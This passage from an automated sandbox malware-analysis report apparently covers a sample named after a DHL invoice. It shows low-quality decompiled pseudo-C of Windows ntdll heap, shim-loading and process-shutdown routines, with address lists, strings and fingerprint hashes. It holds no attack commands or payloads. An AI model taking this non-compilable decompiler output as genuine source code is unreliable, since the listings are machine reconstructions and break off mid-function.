								E1D850D24( *((intOrPtr*)(_t165 - 0x30)));
								E1D850835( *((intOrPtr*)(_t165 - 0x30)), 0);
								goto L34;
							}
							__eflags =  *0x1d8947d4;
							if( *0x1d8947d4 == 0) {
								goto L32;
							}
							_t160 =  *(_t165 - 0x2c);
							_t154 =  *(_t165 - 0x24);
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								_t38 =  &(_t154[0]); // 0xffff
								_t39 =  &(_t154[0]); // 0xffffff
								__eflags = _t160[0] - ( *_t38 ^  *_t39 ^  *_t154);
								if(__eflags != 0) {
									_push(_t133);
									E1D85D646(0, _t162, _t160, _t160, _t162, __eflags);
									_t154 =  *(_t165 - 0x24);
								}
							}
							__eflags = _t160[0] & 0x00000002;
							if((_t160[0] & 0x00000002) == 0) {
								_t86 = _t160[0];
								 *(_t165 - 0x1a) = _t86;
								_t87 = _t86 & 0x000000ff;
							} else {
								_t103 = E1D7D3AE9(_t160);
								 *((intOrPtr*)(_t165 - 0x40)) = _t103;
								_t87 =  *(_t103 + 2) & 0x0000ffff;
							}
							_t136 = _t87;
							 *(_t165 - 0x20) = _t87;
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								_t51 =  &(_t154[0]); // 0xffff
								_t52 =  &(_t154[0]); // 0xffffff
								_t160[0] =  *_t51 ^  *_t52 ^  *_t154;
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								__eflags =  *_t160;
							}
							__eflags = _t136;
							if(_t136 != 0) {
								__eflags = _t136 -  *0x1d8947d4; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								__eflags =  *((intOrPtr*)(_t162 + 0x7c)) -  *0x1d8947d6; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								_t89 =  *[fs:0x30];
								__eflags =  *(_t89 + 0xc);
								if( *(_t89 + 0xc) == 0) {
									_push("HEAP: ");
									E1D79B910();
								} else {
									E1D79B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(L1D84823A(_t162,  *(_t165 - 0x20)));
								E1D79B910("About to free block at %p with tag %ws\n",  *((intOrPtr*)(_t165 + 8)));
								L30:
								_t93 =  *[fs:0x30];
								__eflags =  *((char*)(_t93 + 2));
								if( *((char*)(_t93 + 2)) != 0) {
									 *0x1d8947a1 = 1;
									 *0x1d894100 = 0;
									asm("int3");
									 *0x1d8947a1 = 0;
								}
							}
							goto L32;
						}
						__eflags =  *(_t81 + 0xc);
						if( *(_t81 + 0xc) == 0) {
							_push("HEAP: ");
							E1D79B910();
						} else {
							E1D79B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						E1D79B910("About to free block at %p\n",  *0x1d8947d0);
						goto L30;
					}
				} else {
					_t164 =  *0x1d893750; // 0x0
					 *0x1d8991e0(__ecx, __edx,  *((intOrPtr*)(_t165 + 8)));
					_t75 =  *_t164() & 0x000000ff;
					L35:
					 *[fs:0x0] =  *((intOrPtr*)(_t165 - 0x10));
					return _t75;
				}
			}

0x1d84f8f8
0x1d84f8fa
0x1d84f8ff
0x1d84f906
0x1d84f909
0x1d84f90b
0x1d84f910
0x1d84f912
0x1d84f915
0x1d84f91f
0x1d84f93e
0x1d84f941
0x1d84f94f
0x1d84f954
0x1d84f956
0x1d84fb8c
0x1d84fb8e
0x1d84fb91
0x1d84fb91
0x1d84fb94
0x1d84fb9b
0x1d84fba0
0x00000000
0x1d84fba0
0x1d84f95f
0x1d84f962
0x1d84f96c
0x1d84f96f
0x1d84f972
0x1d84f97a
0x1d84f97f
0x1d84f986
0x1d84f986
0x1d84f98b
0x1d84f98b
0x1d84f992
0x1d84f99a
0x1d84f99d
0x1d84f9a1
0x1d84f9aa
0x1d84f9aa
0x1d84f9aa
0x1d84f9ac
0x1d84f9af
0x1d84f9b7
0x1d84f9b9
0x1d84f9be
0x1d84f9c0
0x00000000
0x1d84f9c6
0x1d84f9c9
0x1d84f9cf
0x1d84f9d5
0x1d84fa1b
0x1d84fa1e
0x1d84fa21
0x1d84fa26
0x1d84fb2b
0x1d84fb37
0x1d84fb39
0x1d84fb41
0x1d84fb4b
0x00000000
0x1d84fb4b
0x1d84fa2c
0x1d84fa33
0x00000000
0x00000000
0x1d84fa39
0x1d84fa3c
0x1d84fa3f
0x1d84fa42
0x1d84fa47
0x1d84fa49
0x1d84fa4c
0x1d84fa51
0x1d84fa54
0x1d84fa56
0x1d84fa5b
0x1d84fa60
0x1d84fa60
0x1d84fa54
0x1d84fa63
0x1d84fa67
0x1d84fa79
0x1d84fa7c
0x1d84fa7f
0x1d84fa69
0x1d84fa6b
0x1d84fa70
0x1d84fa73
0x1d84fa73
0x1d84fa82
0x1d84fa84
0x1d84fa88
0x1d84fa8b
0x1d84fa8d
0x1d84fa90
0x1d84fa95
0x1d84fa9b
0x1d84fa9b
0x1d84fa9b
0x1d84fa9d
0x1d84faa0
0x1d84faa6
0x1d84faad
0x00000000
0x00000000
0x1d84fab3
0x1d84faba
0x00000000
0x00000000
0x1d84fabc
0x1d84fac2
0x1d84fac5
0x1d84fae4
0x1d84fae9
0x1d84fac7
0x1d84fadc
0x1d84fae1
0x1d84fafa
0x1d84fb03
0x1d84fb0b
0x1d84fb0b
0x1d84fb11
0x1d84fb15
0x1d84fb17
0x1d84fb1e
0x1d84fb24
0x1d84fb25
0x1d84fb25
0x1d84fb15
0x00000000
0x1d84faa0
0x1d84f9d7
0x1d84f9da
0x1d84f9f9
0x1d84f9fe
0x1d84f9dc
0x1d84f9f1
0x1d84f9f6
0x1d84fa0f
0x00000000
0x1d84fa15
0x1d84f921
0x1d84f926
0x1d84f92e
0x1d84f936
0x1d84fba2
0x1d84fba5
0x1d84fbb1
0x1d84fbb1

APIs

RtlDebugPrintTimes.NTDLL ref: 1D84F92E

Strings

About to free block at %p, xrefs: 1D84FA0A
HEAP[%wZ]: , xrefs: 1D84F9EC, 1D84FAD7
About to free block at %p with tag %ws, xrefs: 1D84FAFE
HEAP: , xrefs: 1D84F9F9, 1D84FAE4
RtlFreeHeap, xrefs: 1D84F948, 1D84F9B2

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
API String ID: 3446177414-3492000579
Opcode ID: 5d57e3d7c5415f69e60cf18fe2b57af2a6c09c2f330007a0c71561e387c1bea8
Instruction ID: 1f49690446fa8887040116bf5719aa79459b096b7f00915f34ded3978a0ded78
Opcode Fuzzy Hash: 5d57e3d7c5415f69e60cf18fe2b57af2a6c09c2f330007a0c71561e387c1bea8
Instruction Fuzzy Hash: 25710132905289DFCB09CF68D4987ADFBF1FF89224F16C059E5859B261CB31A941CB42

Uniqueness

Uniqueness Score: -1.00%

Function 1D796565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184
timeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E1D796565(intOrPtr* __ecx) {
				signed int _v8;
				char _v16;
				char _v92;
				char _v93;
				char _v100;
				signed short _v106;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t56;
				signed char _t67;
				intOrPtr _t76;
				signed char _t81;
				signed int _t86;
				signed int _t87;
				char _t88;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr* _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t113;
				signed int _t114;
				intOrPtr* _t116;
				signed int _t117;
				void* _t118;

				_v8 =  *0x1d89b370 ^ _t117;
				_v93 = 1;
				_t110 = __ecx;
				E1D7BE8A6(0, 0x4001,  &_v92);
				_t106 =  *0x7ffe0330;
				_t86 =  *0x1d899200; // 0x0
				_t113 = 0x20;
				 *0x1d8965f8 = 1;
				_t92 = _t113 - (_t106 & 0x0000001f);
				asm("ror ebx, cl");
				_t87 = _t86 ^ _t106;
				if( *__ecx == 0) {
					L8:
					_t88 = _v93;
					L9:
					if(_v16 != 0) {
						E1D7CE7E0(_t92, _v92);
					}
					_t114 =  *0x1d899210; // 0x0
					asm("ror esi, cl");
					 *0x1d8991e0();
					 *(_t114 ^  *0x7ffe0330)();
					_t108 =  *0x7ffe0330;
					_t111 =  *0x1d899218; // 0x0
					_push(0x20);
					asm("ror edi, cl");
					_t112 = _t111 ^  *0x7ffe0330;
					E1D7AFED0(0x1d8932d8);
					_t98 = 0x1d895d8c;
					if( *0x1d8965f0 != 0) {
						_t56 =  *0x1d895d8c; // 0x17e2d00
						while(1) {
							__eflags = _t56 - _t98;
							if(_t56 == _t98) {
								break;
							}
							_v100 = _t56;
							_t39 = _t56 + 0x35;
							 *_t39 =  *(_t56 + 0x35) & 0x000000f7;
							__eflags =  *_t39;
							_t56 =  *_t56;
						}
						goto L11;
					} else {
						L11:
						_t116 =  *0x1d895d8c; // 0x17e2d00
						if( *0x1d8965f4 < 2) {
							_t116 =  *_t116;
						}
						if(_t116 == _t98) {
							L15:
							 *0x1d8965f0 = 1;
							 *0x1d8965f8 = 0;
							E1D7AE740(_t98);
							E1D79676F(_t98);
							return E1D7E4B50(_t88, _t88, _v8 ^ _t117, _t108, _t112, _t116, 0x1d8932d8);
						} else {
							do {
								_v100 = _t116;
								_t108 = _t112;
								_t24 = _t116 + 0x50; // 0x17e2cc8
								_t98 =  *_t24;
								E1D796704( *_t24, _t112);
								_t116 =  *_t116;
							} while (_t116 != 0x1d895d8c);
							goto L15;
						}
					}
				} else {
					goto L1;
				}
				do {
					L1:
					E1D7E5050(_t92,  &_v108, _t110);
					_t92 = E1D796B45( &_v108,  &_v92, 1,  &_v100);
					if(_t92 < 0) {
						_t67 =  *0x1d8937c0; // 0x0
						__eflags = _t67 & 0x00000003;
						if((_t67 & 0x00000003) != 0) {
							_push(_t92);
							E1D81E692("minkernel\\ntdll\\ldrinit.c", 0x8ef, "LdrpLoadShimEngine", 0, "Loading the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t67 =  *0x1d8937c0; // 0x0
							_t118 = _t118 + 0x1c;
						}
						__eflags = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							asm("int3");
						}
						_v93 = 0;
						goto L6;
					}
					 *(_v100 + 0x34) =  *(_v100 + 0x34) | 0x00000100;
					E1D7D7DF6(_v100);
					_t76 = _v100;
					_t103 =  *((intOrPtr*)(_t76 + 0x50));
					_t122 =  *((intOrPtr*)(_t103 + 0x20)) - 7;
					if( *((intOrPtr*)(_t103 + 0x20)) != 7) {
						L5:
						 *0x1d8991e0( *((intOrPtr*)(_t76 + 0x18)));
						 *_t87();
						_t92 = _v100;
						E1D7BD3E1(_t87, _v100, _t113);
						goto L6;
					}
					_t113 = E1D7C16EE(_t87, _t103, _t110, _t113, _t122);
					if(_t113 < 0) {
						_t81 =  *0x1d8937c0; // 0x0
						_t88 = 0;
						__eflags = _t81 & 0x00000003;
						if((_t81 & 0x00000003) != 0) {
							_push(_t113);
							E1D81E692("minkernel\\ntdll\\ldrinit.c", 0x909, "LdrpLoadShimEngine", 0, "Initializing the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t81 =  *0x1d8937c0; // 0x0
						}
						__eflags = _t81 & 0x00000010;
						if((_t81 & 0x00000010) != 0) {
							asm("int3");
						}
						_t92 = _t113;
						E1D821D5E(_t113);
						_push(_t113);
						_push(0xffffffff);
						E1D7E2C70();
						_t113 = 0x20;
						goto L9;
					}
					_t76 = _v100;
					goto L5;
					L6:
					_t110 = _t110 + ((_v106 & 0x0000ffff) >> 1) * 2;
				} while ( *_t110 != 0);
				_t113 = 0x20;
				goto L8;
			}

0x1d796574
0x1d79657d
0x1d796581
0x1d79658b
0x1d796590
0x1d796598
0x1d7965a3
0x1d7965a6
0x1d7965ad
0x1d7965b1
0x1d7965b3
0x1d7965b8
0x1d796637
0x1d796637
0x1d79663a
0x1d79663e
0x1d7966fa
0x1d7966fa
0x1d79664c
0x1d796659
0x1d79665f
0x1d796665
0x1d796667
0x1d79666f
0x1d796678
0x1d79667d
0x1d796684
0x1d796686
0x1d796692
0x1d796697
0x1d7f98c3
0x1d7f98d3
0x1d7f98d3
0x1d7f98d5
0x00000000
0x00000000
0x1d7f98ca
0x1d7f98cd
0x1d7f98cd
0x1d7f98cd
0x1d7f98d1
0x1d7f98d1
0x00000000
0x1d79669d
0x1d79669d
0x1d7966a4
0x1d7966aa
0x1d7966ac
0x1d7966ac
0x1d7966b0
0x1d7966c9
0x1d7966cb
0x1d7966d7
0x1d7966dc
0x1d7966e1
0x1d7966f6
0x1d7966b2
0x1d7966b2
0x1d7966b2
0x1d7966b5
0x1d7966b7
0x1d7966b7
0x1d7966ba
0x1d7966bf
0x1d7966c1
0x00000000
0x1d7966b2
0x1d7966b0
0x00000000
0x00000000
0x00000000
0x1d7965ba
0x1d7965ba
0x1d7965bf
0x1d7965d5
0x1d7965d9
0x1d7f9835
0x1d7f983a
0x1d7f983c
0x1d7f983e
0x1d7f9859
0x1d7f985e
0x1d7f9863
0x1d7f9863
0x1d7f9866
0x1d7f9868
0x1d7f986a
0x1d7f986a
0x1d7f986d
0x00000000
0x1d7f986d
0x1d7965e2
0x1d7965ec
0x1d7965f1
0x1d7965f4
0x1d7965f7
0x1d7965fb
0x1d79660f
0x1d796614
0x1d79661a
0x1d79661c
0x1d79661f
0x00000000
0x1d79661f
0x1d796602
0x1d796606
0x1d7f9875
0x1d7f987a
0x1d7f987c
0x1d7f987e
0x1d7f9880
0x1d7f989a
0x1d7f989f
0x1d7f98a4
0x1d7f98a7
0x1d7f98a9
0x1d7f98ab
0x1d7f98ab
0x1d7f98ac
0x1d7f98ae
0x1d7f98b3
0x1d7f98b4
0x1d7f98b6
0x1d7f98bd
0x00000000
0x1d7f98bd
0x1d79660c
0x00000000
0x1d796624
0x1d79662a
0x1d79662f
0x1d796636
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 1D796614
RtlDebugPrintTimes.NTDLL ref: 1D79665F

Strings

LdrpLoadShimEngine, xrefs: 1D7F984A, 1D7F988B
Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1D7F9843
Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1D7F9885
minkernel\ntdll\ldrinit.c, xrefs: 1D7F9854, 1D7F9895

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: 4ea55eb3c01dd767e90fcd5923aca2536a4ac0e6d70e696dc1c43bacdb5e6dc2
Instruction ID: 67e8e092b6247a68357754d9598d2967d487f466f00c4f69a04c5ee85903a2f0
Opcode Fuzzy Hash: 4ea55eb3c01dd767e90fcd5923aca2536a4ac0e6d70e696dc1c43bacdb5e6dc2
Instruction Fuzzy Hash: F2513B36A043649FCB1CDBA8DC98FAD77B5BB84374F050226E591AF2A5DB70AC40C752

Uniqueness

Uniqueness Score: -1.00%

Function 1D7CD6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E1D7CD6D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				intOrPtr _t70;
				signed int _t78;
				signed char _t79;
				intOrPtr _t85;
				intOrPtr _t88;
				intOrPtr _t97;
				char _t99;
				signed int _t102;
				signed int _t103;
				signed char _t106;
				signed int _t108;
				signed int _t112;
				intOrPtr _t119;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t127;
				intOrPtr _t129;
				intOrPtr _t134;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t143;

				_push(0x68);
				_push(0x1d87c5e8);
				_t68 = E1D7F7BE4(__ebx, __edi, __esi);
				_t127 =  *[fs:0x18];
				_t97 =  *((intOrPtr*)(_t127 + 0x30));
				if( *0x1d895da8 != 0) {
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
					return _t68;
				}
				_t102 =  *(_t97 + 0x10);
				 *((intOrPtr*)(_t141 - 0x30)) =  *((intOrPtr*)(_t102 + 0x40));
				_t70 =  *((intOrPtr*)(_t102 + 0x44));
				 *((intOrPtr*)(_t141 - 0x2c)) = _t70;
				_t103 =  *(_t97 + 0x10);
				if(( *(_t103 + 8) & 0x00000001) == 0) {
					 *((intOrPtr*)(_t141 - 0x2c)) = _t70 + _t103;
				}
				if(( *0x1d8937c0 & 0x00000005) != 0) {
					_push(_t141 - 0x30);
					E1D81E692("minkernel\\ntdll\\ldrinit.c", 0x17f5, "LdrShutdownProcess", 2, "Process 0x%p (%wZ) exiting\n",  *((intOrPtr*)(_t127 + 0x20)));
					_t143 = _t143 + 0x1c;
				}
				_t74 =  *((intOrPtr*)(_t127 + 0x24));
				 *0x1d895dac =  *((intOrPtr*)(_t127 + 0x24));
				 *0x1d895da8 = 1;
				if( *0x1d8965f0 != 0) {
					_t137 =  *0x1d8991f8; // 0x0
					asm("ror esi, cl");
					_t138 = _t137 ^  *0x7ffe0330;
					_t103 = _t138;
					 *0x1d8991e0(0x20);
					_t74 =  *_t138();
				}
				_t118 =  *((intOrPtr*)(_t127 + 0xfb4));
				if( *((intOrPtr*)(_t127 + 0xfb4)) != 0) {
					_push(1);
					E1D7A4779(_t74, _t118);
				}
				if(( *0x1d89391c & 0x00000002) == 0) {
					_t78 =  *(_t97 + 0x10);
					__eflags =  *(_t78 + 8) & 0x40000000;
					_t106 = _t103 & 0xffffff00 | ( *(_t78 + 8) & 0x40000000) == 0x00000000;
					__eflags =  *0x1d899234 & 0x00000001;
					_t79 = _t78 & 0xffffff00 | ( *0x1d899234 & 0x00000001) == 0x00000000;
					__eflags = _t79 & _t106;
					if((_t79 & _t106) == 0) {
						goto L7;
					}
					 *((char*)(_t141 - 0x19)) = 1;
					_t99 = 0;
					L15:
					_t85 =  *[fs:0x30];
					__eflags =  *0x1d8968c8;
					if( *0x1d8968c8 != 0) {
						__eflags =  *((intOrPtr*)(_t85 + 0x18)) - _t99;
						if( *((intOrPtr*)(_t85 + 0x18)) != _t99) {
							E1D820FC8();
							 *0x1d8968c8 = _t99;
						}
					}
					__eflags =  *((char*)(_t141 - 0x19));
					if( *((char*)(_t141 - 0x19)) == 0) {
						E1D7CD8F0();
					}
					_t68 = E1D7CD898();
					goto L19;
				}
				L7:
				_t99 = 0;
				 *((char*)(_t141 - 0x19)) = 0;
				_t129 =  *0x1d895da0; // 0x180a0b8
				L8:
				if(_t129 != 0x1d895d9c) {
					_t18 = _t129 - 0x10; // 0x180a0a8
					_t122 = _t18;
					 *((intOrPtr*)(_t141 - 0x24)) = _t122;
					_t20 = _t129 + 4; // 0x180a588
					_t129 =  *_t20;
					 *((intOrPtr*)(_t141 - 0x20)) = _t129;
					_t22 = _t122 + 0x1c; // 0x73e291a0
					_t88 =  *_t22;
					 *((intOrPtr*)(_t141 - 0x28)) = _t88;
					if(_t88 != 0 && ( *(_t122 + 0x34) & 0x00080000) != 0) {
						 *((intOrPtr*)(_t141 - 0x54)) = 0x24;
						 *((intOrPtr*)(_t141 - 0x50)) = 1;
						_t112 = 7;
						memset(_t141 - 0x4c, 0, _t112 << 2);
						_t143 = _t143 + 0xc;
						_t31 = _t122 + 0x48; // 0x0
						E1D7BDC40(_t141 - 0x54,  *_t31);
						 *((intOrPtr*)(_t141 - 4)) = _t99;
						_t134 =  *((intOrPtr*)(_t141 - 0x24));
						_t157 =  *((intOrPtr*)(_t134 + 0x3a)) - _t99;
						if( *((intOrPtr*)(_t134 + 0x3a)) != _t99) {
							E1D7BF0A3(_t99, 0, _t134, _t134, 1, __eflags);
						}
						_push(1);
						_push(_t99);
						E1D7BDCD1(_t99,  *((intOrPtr*)(_t141 - 0x28)),  *((intOrPtr*)(_t134 + 0x18)), _t134, 1, _t157);
						 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
						_t129 =  *((intOrPtr*)(_t141 - 0x20));
						E1D7CD886();
					}
					goto L8;
				}
				_t119 =  *0x1d895b24; // 0x17e2d00
				__eflags =  *((intOrPtr*)(_t119 + 0x3a)) - _t99;
				if( *((intOrPtr*)(_t119 + 0x3a)) != _t99) {
					 *((intOrPtr*)(_t141 - 0x78)) = 0x24;
					 *((intOrPtr*)(_t141 - 0x74)) = 1;
					_t108 = 7;
					memset(_t141 - 0x70, 0, _t108 << 2);
					_t47 = _t119 + 0x48; // 0x0
					E1D7BDC40(_t141 - 0x78,  *_t47);
					 *((intOrPtr*)(_t141 - 4)) = 1;
					_t121 =  *0x1d895b24; // 0x17e2d00
					E1D7BF0A3(_t99, 0, _t121, _t141 - 0x70 + _t108, 1, __eflags);
					 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
					E1D7CD88F();
				}
				goto L15;
			}

0x1d7cd6d0
0x1d7cd6d2
0x1d7cd6d7
0x1d7cd6dc
0x1d7cd6e3
0x1d7cd6ed
0x1d7cd810
0x1d7cd813
0x1d7cd81f
0x1d7cd81f
0x1d7cd6f3
0x1d7cd6f9
0x1d7cd6fc
0x1d7cd6ff
0x1d7cd702
0x1d7cd709
0x1d80f0c2
0x1d80f0c2
0x1d7cd716
0x1d80f0cd
0x1d80f0e7
0x1d80f0ec
0x1d80f0ec
0x1d7cd71c
0x1d7cd71f
0x1d7cd724
0x1d7cd732
0x1d7cd86d
0x1d7cd873
0x1d7cd875
0x1d7cd877
0x1d7cd879
0x1d7cd87f
0x1d7cd87f
0x1d7cd738
0x1d7cd740
0x1d7cd742
0x1d7cd744
0x1d7cd744
0x1d7cd750
0x1d80f0f4
0x1d80f0f7
0x1d80f0fe
0x1d80f101
0x1d80f108
0x1d80f10b
0x1d80f10d
0x00000000
0x00000000
0x1d80f113
0x1d80f117
0x1d7cd7ed
0x1d7cd7ed
0x1d7cd7f3
0x1d7cd7fa
0x1d80f13c
0x1d80f13f
0x1d80f145
0x1d80f14a
0x1d80f14a
0x1d80f13f
0x1d7cd800
0x1d7cd804
0x1d7cd806
0x1d7cd806
0x1d7cd80b
0x00000000
0x1d7cd80b
0x1d7cd756
0x1d7cd756
0x1d7cd75a
0x1d7cd75d
0x1d7cd766
0x1d7cd76c
0x1d7cd76e
0x1d7cd76e
0x1d7cd771
0x1d7cd774
0x1d7cd774
0x1d7cd777
0x1d7cd77a
0x1d7cd77a
0x1d7cd77d
0x1d7cd782
0x1d7cd78d
0x1d7cd794
0x1d7cd799
0x1d7cd79f
0x1d7cd79f
0x1d7cd7a1
0x1d7cd7a7
0x1d7cd7ac
0x1d7cd7af
0x1d7cd7b2
0x1d7cd7b6
0x1d7cd7da
0x1d7cd7da
0x1d7cd7b8
0x1d7cd7b9
0x1d7cd7c0
0x1d7cd7c5
0x1d7cd7cc
0x1d7cd7cf
0x1d7cd7cf
0x00000000
0x1d7cd782
0x1d7cd7e1
0x1d7cd7e7
0x1d7cd7eb
0x1d7cd820
0x1d7cd827
0x1d7cd82c
0x1d7cd832
0x1d7cd834
0x1d7cd83a
0x1d7cd83f
0x1d7cd842
0x1d7cd84a
0x1d7cd84f
0x1d7cd856
0x1d7cd856
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 1D7CD879

Part of subcall function 1D7A4779: RtlDebugPrintTimes.NTDLL ref: 1D7A4817

Strings

LdrShutdownProcess, xrefs: 1D80F0D8
$, xrefs: 1D7CD820
$, xrefs: 1D7CD78D
Process 0x%p (%wZ) exiting, xrefs: 1D80F0D1
minkernel\ntdll\ldrinit.c, xrefs: 1D80F0E2

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1975516107
Opcode ID: f580f556d780abc02a87024b57b84190f9f78b44db6e00b4df3255322a1ece3f
Instruction ID: 3deb6be1988183fd824740564a6dd6322cc45095fafe645fc0568593c5ab6fa3
Opcode Fuzzy Hash: f580f556d780abc02a87024b57b84190f9f78b44db6e00b4df3255322a1ece3f
Instruction Fuzzy Hash: 4F514675E04397CFCB18CFA8C8847ADBBF1BF88324F15805AD5046B291D770A942CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1D7CDA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133
timeCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E1D7CDA20(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _t44;
				char* _t45;
				void* _t65;
				intOrPtr _t72;
				signed int _t73;
				intOrPtr _t74;
				void* _t82;
				signed char* _t87;
				signed char _t90;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr* _t94;
				signed int* _t95;

				_t93 = _a4;
				if( *((intOrPtr*)(_t93 + 8)) == 0xddeeddee) {
					E1D869335(_t93, 0, __ecx);
					L6:
					_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t44 != 0) {
						if( *_t44 == 0) {
							goto L7;
						}
						_t45 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L8:
						if( *_t45 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E1D85F717(_t93);
							}
						}
						return 1;
					}
					L7:
					_t45 = 0x7ffe0380;
					goto L8;
				}
				if(( *(_t93 + 0x44) & 0x01000000) != 0) {
					_t94 =  *0x1d89376c; // 0x0
					 *0x1d8991e0(_t93);
					return  *_t94();
				}
				if( *((intOrPtr*)(_t93 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E1D79B910();
					} else {
						E1D79B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1D79B910("Invalid heap signature for heap at %p", _t93);
					E1D79B910(", passed to %s", "RtlUnlockHeap");
					_push("\n");
					E1D79B910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1d8947a1 = 1;
						asm("int3");
						 *0x1d8947a1 = 0;
					}
					return 0;
				}
				if(( *(_t93 + 0x40) & 0x00000001) != 0) {
					goto L6;
				}
				_t92 =  *((intOrPtr*)(_t93 + 0xc8));
				 *((intOrPtr*)(_t93 + 0xe8)) =  *((intOrPtr*)(_t93 + 0xe8)) + 0xffff;
				_t13 = _t92 + 8;
				 *_t13 =  *((intOrPtr*)(_t92 + 8)) - 1;
				if( *_t13 != 0) {
					goto L6;
				}
				 *(_t92 + 0xc) =  *(_t92 + 0xc) & 0x00000000;
				_t87 = _t92 + 4;
				_t65 = 0xfffffffe;
				asm("lock cmpxchg [edx], ecx");
				_v12 = 0xffff;
				if(_t65 != 0xfffffffe) {
					if(( *_t87 & 0x00000001) != 0) {
						E1D83AA40(_t92);
					}
					_t72 =  *((intOrPtr*)(_t92 + 0x10));
					_v8 = _t72;
					if(_t72 == 0) {
						_v8 = E1D7CFEC0(_t92);
					}
					_v16 = _v16 & 0x00000000;
					_t95 = _t92 + 4;
					_t73 = _v12;
					while(1) {
						_t90 = _t73 & 0x00000002 | 0x00000001;
						_t82 = _t90 + _t73;
						asm("lock cmpxchg [esi], ecx");
						if(_t73 == _t73) {
							break;
						}
						E1D7CBAC0(_t82,  &_v16);
						_t73 =  *_t95;
					}
					_t93 = _a4;
					_t74 = _v8;
					if((_t90 & 0x00000002) != 0) {
						E1D7CF300(_t92, _t74);
					}
				}
				goto L6;
			}

0x1d7cda2a
0x1d7cda35
0x1d80f408
0x1d7cda90
0x1d7cda96
0x1d7cda9b
0x1d80f510
0x00000000
0x00000000
0x1d80f51f
0x1d7cdaa6
0x1d7cdaa9
0x1d80f537
0x1d80f53f
0x1d80f53f
0x1d80f537
0x00000000
0x1d7cdaaf
0x1d7cdaa1
0x1d7cdaa1
0x00000000
0x1d7cdaa1
0x1d7cda42
0x1d80f413
0x1d80f41b
0x00000000
0x1d80f421
0x1d7cda4f
0x1d80f432
0x1d80f451
0x1d80f456
0x1d80f434
0x1d80f449
0x1d80f44e
0x1d80f462
0x1d80f471
0x1d80f476
0x1d80f47b
0x1d80f48d
